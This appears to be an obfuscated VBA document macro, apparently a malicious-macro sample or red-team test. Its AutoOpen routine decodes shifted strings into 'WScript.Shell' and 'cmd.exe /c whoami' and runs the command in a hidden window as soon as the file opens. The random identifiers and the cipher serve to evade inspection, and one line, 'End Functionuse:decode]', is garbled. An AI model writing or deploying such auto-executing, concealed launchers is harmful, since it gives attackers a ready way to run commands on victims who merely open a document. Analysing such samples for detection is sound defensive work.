


Sub AutoOpen()
	Dim UVnyc As String
	Dim wBqvMCQDrpQnqEQdFiaVMhs As Object
	Dim IBkVIhdVEjFkKxMXhGSNZM As Integer
	Dim AspaBnS As String

	IBkVIhdVEjFkKxMXhGSNZM = 02
	UVnyc = "[wgvmtx2Wlipp"
	Set wBqvMCQDrpQnqEQdFiaVMhs = CreateObject(decode(UVnyc))
	AspaBnS = jxbxJQJ("QeXhJMtYDsE")
	AspaBnS = TjdKMWNdWHxQRlwOeJ(wBqvMCQDrpQnqEQdFiaVMhs, AspaBnS, IBkVIhdVEjFkKxMXhGSNZM)
End Sub

Function jxbxJQJ(TpVcTQb As String) As String
	Dim aySghRhG As String
	Dim ZeThGCkxLgCdfnZjJ As String
	Dim AzCEcfkT As String
	AzCEcfkT = "gqh2i|i$3g${lseqm"

	aySghRhG = AzCEcfkT
	aySghRhG = decode(aySghRhG)
	jxbxJQJ = aySghRhG
End Function

Function TjdKMWNdWHxQRlwOeJ(RkudatUrWkkRPAwk As Object, EdZpfEiwGGrEjwrbggiXAlgx As String, CvepEftrpYjpVDsVTEd As Integer) As String
	Dim bCAHdovUyyksMCYLM As String
	Dim eHLBnsmUpPD As Integer
	eHLBnsmUpPD = 1
	bCAHdovUyyksMCYLM = EdZpfEiwGGrEjwrbggiXAlgx
    If (CvepEftrpYjpVDsVTEd > eHLBnsmUpPD) Then
		eHLBnsmUpPD = CvepEftrpYjpVDsVTEd - CvepEftrpYjpVDsVTEd
		RkudatUrWkkRPAwk.Run bCAHdovUyyksMCYLM, eHLBnsmUpPD, True
	End If
	bCAHdovUyyksMCYLM = "DFzycLgYOq"
	TjdKMWNdWHxQRlwOeJ = bCAHdovUyyksMCYLM
End Functionuse:decode]

Function decode(decode1 As String) As String
	Dim decode2 As Long
	Dim decode3 As String
	Dim decode4 As Integer
	decode4 = 4
	For decode2 = 1 To Len(decode1)
		decode3 = decode3 & Chr(Asc(Mid(decode1, decode2, 1)) - decode4)
	Next decode2
	decode = decode3
End Function